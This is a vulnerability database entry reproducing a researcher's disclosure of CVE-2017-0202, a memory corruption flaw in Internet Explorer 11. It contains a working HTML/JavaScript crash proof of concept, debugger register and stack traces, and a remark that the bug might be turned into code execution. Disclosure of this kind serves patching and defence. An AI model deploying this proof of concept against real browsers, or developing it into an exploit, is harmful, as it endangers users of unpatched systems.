Lucene search
K

Microsoft Internet Explorer CStyleSheetArray::BuildListOfMatchedRules Memory Corruption

🗓️ 27 Apr 2017 00:00:00Reported by Ivan FratricType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 57 Views

Memory Corruption in Internet Explorer CStyleSheetArra

Related
Code
` Microsoft IE: Memory corruption in CStyleSheetArray::BuildListOfMatchedRules   
  
CVE-2017-0202  
  
  
There is a memory corruption vulnerability in Internet Explorer. The vulnerability was confirmed on Internet Explorer Version 11.576.14393.0 (Update Version 11.0.38) running on Windows 10 64-bit with page heap enabled for iexplore.exe process.  
  
PoC:  
  
===========================================================  
  
<!-- saved from url=(0014)about:internet -->  
<style>  
#details { transition-duration: 61s; }  
</style>  
<script>  
function go() {  
document.fgColor = "foo";  
m.setAttribute("foo", "bar");  
document.head.innerHTML = "a";  
}  
</script>  
<body onload=go()>  
<details id="details">  
<summary style="transform: scaleY(4)">  
<marquee id="m" bgcolor="rgb(135,114,244)">aaaaaaaaaaaaa</marquee>  
<style></style>  
  
===========================================================  
  
The crash happens in CStyleSheetArray::BuildListOfMatchedRules while attempting to read memory outside of the bounds of the object pointed by eax (possibly due to a type confusion issue, but I didn't investigate in detail). If that read is successful and attacker-controlled address is read into edi, this down the line leads to a write at the attacker controlled address in CStyleSheetArray::BuildListOfProbableRules. Thus it might be possible to turn the issue into code execution.  
  
Debug info:  
  
(d10.1504): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770  
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202  
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:  
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????  
  
0:021> r  
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770  
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202  
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:  
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????  
  
0:021> k  
# ChildEBP RetAddr   
00 173ddaa4 71eb3674 MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77  
01 173ddd6c 71eb041e MSHTML!CElement::ApplyStyleSheets+0x504  
02 173ddd9c 720b43e5 MSHTML!CElement::ApplyDefaultFormat+0x8e  
03 173de1b0 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0xe25  
04 173de248 720b343a MSHTML!CElement::ComputeFormats+0x374  
05 173de274 720b36cd MSHTML!CFormatInfo::FindFormattingParent+0x45a  
06 173de690 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0x10d  
07 173de738 71ede88b MSHTML!CElement::ComputeFormats+0x374  
08 173de754 71ede3c4 MSHTML!CTreeNode::ComputeFormats+0x6b  
09 173df3b0 722e4e79 MSHTML!CTreeNode::ComputeFormatsHelper+0x34  
0a 173df3b8 7201745c MSHTML!CTreeNode::GetSvgFormatHelper+0xa  
0b 173df3c0 72756588 MSHTML!Tree::Style::HasCompositionItems+0x26  
0c 173df3cc 72787473 MSHTML!Layout::InlineLayout::HasCompositionItems+0x28  
0d 173df5dc 72788c30 MSHTML!CDispScroller::CalcScrollBits+0x526  
0e 173df6c8 72246c2a MSHTML!CDispScroller::InvalidateScrollDelta+0x147  
0f 173df6f4 71d8174e MSHTML!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xf8a1a  
10 173df710 71d81667 MSHTML!CRenderTaskApplyPSP::ProcessScrollerUpdateRequests+0x34  
11 173df740 71f0e9bb MSHTML!CRenderTaskApplyPSP::Execute+0xe7  
12 173df79c 71de27d3 MSHTML!CRenderThread::RenderThread+0x31b  
13 173df7ac 72fa17cd MSHTML!CRenderThread::StaticRenderThreadProc+0x23  
14 173df7e4 74c362c4 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x8d  
15 173df7f8 77700fd9 KERNEL32!BaseThreadInitThunk+0x24  
16 173df840 77700fa4 ntdll!__RtlUserThreadStart+0x2f  
17 173df850 00000000 ntdll!_RtlUserThreadStart+0x1b  
  
  
This bug is subject to a 90 day disclosure deadline. If 90 days elapse  
without a broadly available patch, then the bug report will automatically  
become visible to the public.  
  
  
  
  
Found by: ifratric  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2017 00:00Current
0.9Low risk
Vulners AI Score0.9
EPSS0.45648
57